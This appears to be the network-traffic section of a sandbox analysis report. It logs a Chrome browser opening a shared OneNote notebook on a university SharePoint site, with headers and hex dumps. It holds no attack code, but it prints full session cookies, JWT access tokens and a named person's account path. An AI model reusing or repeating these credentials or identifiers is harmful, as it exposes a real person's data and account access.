                                                2022-10-03 13:38:23 UTC406OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 30 30 38 30 38 2c 22 4c 22 3a 5b 7b 22 47 22 3a 32 30 30 32 35 36 37 39 2c 22 54 22 3a 2d 34 31 36 2c 22 4d 22 3a 22 53 65 74 41 70 70 49 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 53 74 61 74 75 73 3a 20 61 70 70 43 74 6f 72 53 74 61 72 74 69 6e 67 22 2c 22 43 22 3a 33 30 36 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 35 39 32 34 38 37 38 39 32 2c 22 54 22 3a 2d 34 30 36 2c 22 4d 22 3a 22 49 73 48 6f 73 74 46 72 61 6d 65 54 72 75 73 74 65 64 3a 32 22 2c 22 43 22 3a 33 30 36 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 33 39 30 38 39 31 31 33 2c 22 54 22 3a 2d 33 39 39 2c 22 4d 22 3a 22 53 53 45 44 3a 73 74 61 72 74 73 65 73 73 69 6f 6e 20 69 6e 66 6f 20 73 65 6e 74 20 74 6f 20 4f 74 65 6c 22 2c 22 43 22 3a 33 30 36 2c 22 44
                                                Data Ascii: {"T":1664836700808,"L":[{"G":20025679,"T":-416,"M":"SetAppInitializationStatus: appCtorStarting","C":306,"D":50},{"G":592487892,"T":-406,"M":"IsHostFrameTrusted:2","C":306,"D":50},{"G":39089113,"T":-399,"M":"SSED:startsession info sent to Otel","C":306,"D
                                                2022-10-03 13:38:23 UTC419INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: c229b2a6-c4d9-444c-96d5-bae7542cf5d5
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006C2
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006C2
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 394611132B6B4477820A4F819AA53EB4 Ref B: AMS231032609011 Ref C: 2022-10-03T13:38:23Z
                                                Date: Mon, 03 Oct 2022 13:38:23 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.34970913.107.136.9443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:16 UTC1OUTGET /:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W HTTP/1.1
                                                Host: insacentre-my.sharepoint.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:16 UTC5INHTTP/1.1 302 Found
                                                Cache-Control: private
                                                Content-Length: 592
                                                Content-Type: text/html; charset=utf-8
                                                Location: https://insacentre-my.sharepoint.com/personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc=%7B5c627324-b4e6-4967-a31a-5c2e2767a2a0%7D&action=default&slrid=e6036ba0-60ed-5000-3b56-ec6f32cafafb&originalPath=aHR0cHM6Ly9pbnNhY2VudHJlLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL2NocmlzdGVsX2NoZXZlcmVhdV9pbnNhLWN2bF9mci9FaVJ6WWx6bXRHZEpveHBjTGlkbm9xQUJkV18xMjVNQlg0bXh6bkdybTkzeXJBP3J0aW1lPTNTSGZoa1NsMmtn&cid=b4d974bd-1cf6-430c-b9ae-4dde6b87b7da
                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                Set-Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEyLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRjMmJkZTNkYzZmMWJkZDkyYjE0NmZlZDdhNmQyNjczYmU2YWJhMzhlODJkYTBmMzc4ZTAzZjgwM2ExNjE2NGMsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YywxMzMwOTI3ODE5NjAwMDAwMDAsMCwxMzMwOTM2NDI5NjUxNjMyOTksMC4wLjAuMCwyNTgsMjJhNzdhYTQtYjFkNS00MDJiLTkxZmItYmI2MThhM2I4YmVhLCwsZTYwMzZiYTAtNjBlZC01MDAwLTNiNTYtZWM2ZjMyY2FmYWZiLGU2MDM2YmEwLTYwZWQtNTAwMC0zYjU2LWVjNmYzMmNhZmFmYixZM20reUttZ0FrdUhLK2xRY1oyUi93LDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCxtaHFjWnNqWUxCRjRjcGo3UDlReDhkdHFmOWVLMlp0d3B5NnNPVjF5OTJockVHVTM2M3pVZ0xLeVI4S0JjK3lpeVkxbmhWQ3EvOTRJbVRlV2pObkpNM3lRM29sUHJpcm1GTGJyTk9JUzZPRnBhNFUrNGV6T0xhMjNLOGdlTUc2Um5pUVVTOFp4YWNtVjJlMWEwNkNmamZ1VmljR1lXNnRZZVREdVlHZnF6Sy8zTFZsQ2dPWlQ1eUdJM2EyK1VTczBuK3BTQk1neFBRLzZzRnEvYW1WTlp3MXNDRHZiaXZzajFsNjQwdFFjV3NVQUJRbnJTUk0rdThJbEljNC9GUDh5QjUrUjJ1RXZYTUlyM21SdGxXTTRmV1l4SzNGeFYxVW8rZTZlb1pVVEhGU25jR1NIUU92NmFhc3g3SjNieEhxTXJPMlVKUXh4V01pSkhXa2hqR292b0E9PTwvU1A+; path=/; SameSite=None; secure; HttpOnly
                                                X-SharePointHealthScore: 1
                                                X-MS-SPO-CookieValidator: mhqcZsjYLBF4cpj7P9Qx8dtqf9eK2Ztwpy6sOV1y92hrEGU363zUgLKyR8KBc+yiyY1nhVCq/94ImTeWjNnJM3yQ3olPrirmFLbrNOIS6OFpa4U+4ezOLa23K8geMG6RniQUS8ZxacmV2e1a06CfjfuVicGYW6tYeTDuYGfqzK/3LVlCgOZT5yGI3a2+USs0n+pSBMgxPQ/6sFq/amVNZw1sCDvbivsj1l640tQcWsUABQnrSRM+u8IlIc4/FP8yB5+R2uEvXMIr3mRtlWM4fWYxK3FxV1Uo+e6eoZUTHFSncGSHQOv6aasx7J3bxHqMrO2UJQxxWMiJHWkhjGovoA==
                                                X-AspNet-Version: 4.0.30319
                                                X-DataBoundary: None
                                                X-1DSCollectorUrl: https://eu-mobile.events.data.microsoft.com/OneCollector/1.0/
                                                X-AriaCollectorURL: https://eu-mobile.events.data.microsoft.com/Collector/3.0
                                                SPRequestGuid: e6036ba0-60ed-5000-3b56-ec6f32cafafb
                                                request-id: e6036ba0-60ed-5000-3b56-ec6f32cafafb
                                                MS-CV: oGsD5u1gAFA7VuxvMsr6+w.0
                                                Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=22a77aa4-b1d5-402b-91fb-bb618a3b8bea&destinationEndpoint=Edge-Prod-AMS04r5a&frontEnd=AFD"}]}
                                                NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                Strict-Transport-Security: max-age=31536000
                                                X-FRAME-OPTIONS: SAMEORIGIN
                                                Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com securebroker.sharepointonline.com;
                                                SPRequestDuration: 147
                                                SPIisLatency: 2
                                                X-Powered-By: ASP.NET
                                                MicrosoftSharePointTeamServices: 16.0.0.22914
                                                X-Content-Type-Options: nosniff
                                                X-MS-InvokeApp: 1; RequireReadOnly
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Ref: Ref A: 166C77EF619C48ABBA3B6420C19852DE Ref B: AMS04EDGE1113 Ref C: 2022-10-03T13:38:16Z
                                                Date: Mon, 03 Oct 2022 13:38:15 GMT
                                                Connection: close
                                                2022-10-03 13:38:16 UTC9INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6e 73 61 63 65 6e 74 72 65 2d 6d 79 2e 73 68 61 72 65 70 6f 69 6e 74 2e 63 6f 6d 2f 70 65 72 73 6f 6e 61 6c 2f 63 68 72 69 73 74 65 6c 5f 63 68 65 76 65 72 65 61 75 5f 69 6e 73 61 2d 63 76 6c 5f 66 72 2f 5f 6c 61 79 6f 75 74 73 2f 31 35 2f 44 6f 63 2e 61 73 70 78 3f 73 6f 75 72 63 65 64 6f 63 3d 25 37 42 35 63 36 32 37 33 32 34 2d 62 34 65 36 2d 34 39 36 37 2d 61 33 31 61 2d 35 63 32 65 32 37 36 37 61 32 61 30 25 37 44 26 61 6d 70 3b 61 63 74 69 6f 6e 3d 64 65 66 61 75 6c 74 26 61 6d
                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://insacentre-my.sharepoint.com/personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc=%7B5c627324-b4e6-4967-a31a-5c2e2767a2a0%7D&amp;action=default&am


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                20192.168.2.34978613.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:23 UTC420OUTGET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:23 UTC423INHTTP/1.1 500 Internal Server Error
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 561ac2ac-cf0a-465d-b3f0-7ac4985a24f5
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF00000696
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF00000696
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 7F40F49DC7384383BBB83B8554D2081C Ref B: AMS231032608019 Ref C: 2022-10-03T13:38:23Z
                                                Date: Mon, 03 Oct 2022 13:38:23 GMT
                                                Connection: close
                                                2022-10-03 13:38:23 UTC424INData Raw: 34 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 35 30 30 20
                                                Data Ascii: 4b8<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>500
                                                2022-10-03 13:38:23 UTC425INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                21192.168.2.34979113.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:24 UTC425OUTGET /afhs/CloudPolicySettings.ashx HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                x-OcpsIsEnabled: true
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                x-CacheIsEnabled: false
                                                sec-ch-ua-platform: "Windows"
                                                X-IsCoauthSession: true
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                x-LicensingAADIdIsEnabled: false
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                x-LicensingIsEnabled: true
                                                x-UserDataSignature: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImVPbU15aUItZHhmd2RnV1RuSDdhWkU0VXRNRSJ9.eyJVUE4iOiJ1cm46c3BvOmFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIlBVSUQiOiIiLCJUZW5hbnRJZCI6ImY3NDIxNDUwLWRmMTYtNDcxNC1hZGExLTM5NTM5MGNiOTFkMyIsIkZpbGVUZW5hbnRJZCI6IiIsIklzQ29uc3VtZXJVc2VyIjoiRmFsc2UiLCJJc0Fub255bW91c1VzZXIiOiJUcnVlIiwiSG9zdEVuYWJsZWRGZWF0dXJlcyI6IltdIiwiSXNPMzY1Q29uc3VtZXJIb3N0IjoiRmFsc2UiLCJJc08zNjVDb21tZXJjaWFsSG9zdCI6IlRydWUiLCJVc2VyT2JqZWN0SWQiOiIiLCJMb2NhbFN0b3JhZ2VLZXkiOiJUL1pHU2RtTndCUjljK1FhS01GVENpUnR6WU82TmZpUGQ0aWVqTmtoajVnPSIsImlzcyI6IldBQyIsImV4cCI6MTY2NDgwNTYxNywibmJmIjoxNjY0ODA0Mjk3fQ.EwlIBoEhIM5wyvm5XGu2Uxc6H0_ZS2kaSFQmRw7YYP0YqLRhWnKSwuS7EOILeWpuG5JJ5HG7TV_UEsz8vYOw9MBn5moQ8C8Ywv5n2iDy4F2xj4Isfede8ld1xEEcoXN8rap7floFnz4qxPwt8xCABKRjuGm84wYZ3wzgGe7vjb-cP34sUYMIODpegGbVQZUFcW8vGQaNQfSfymUCtGlRNflS6F-QZjhZfptJ-4tF7Ptsb6kHV8D7SwHuByS05zP6RmiYRUn4oaptfKAY6SY2FF80T4CFj7hktAKDDPo2lYE8Xo-6LpH9ZFAnHR76-xyCj3ECBONb0OC7XD0Mbah-wA
                                                X-UserType: WOPI
                                                X-AccessTokenTtl: 1664840296804
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1
                                                2022-10-03 13:38:24 UTC450INHTTP/1.1 200 OK
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Content-Length: 371
                                                Content-Type: application/json; charset=utf-8
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                Set-Cookie: GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca;Path=/;Domain=euc-onenote.officeapps.live.com; samesite=none; secure
                                                X-CorrelationId: 7fb15764-a377-4a6a-86d3-9e22eacbfd82
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                X-OfficeFE: AM1PEPF000008A9
                                                X-OfficeVersion: 16.0.15721.41013
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-Content-Type-Options: nosniff
                                                CheckIn-Interval: 1440
                                                X-OFFICEFD: AM1PEPF00006A25
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: C599152EDFA6442ABCFC7F865A13B643 Ref B: AMS231032606021 Ref C: 2022-10-03T13:38:24Z
                                                Date: Mon, 03 Oct 2022 13:38:23 GMT
                                                Connection: close
                                                2022-10-03 13:38:24 UTC452INData Raw: 7b 22 50 6f 6c 69 63 79 53 65 74 74 69 6e 67 73 22 3a 7b 7d 2c 22 43 6f 6e 74 72 6f 6c 6c 65 72 43 6f 6e 6e 65 63 74 65 64 53 65 72 76 69 63 65 73 46 65 61 74 75 72 65 4e 61 6d 65 73 22 3a 5b 22 6d 73 6f 5f 6f 66 66 69 63 65 53 74
                                                Data Ascii: {"PolicySettings":{},"ControllerConnectedServicesFeatureNames":["mso_officeSt
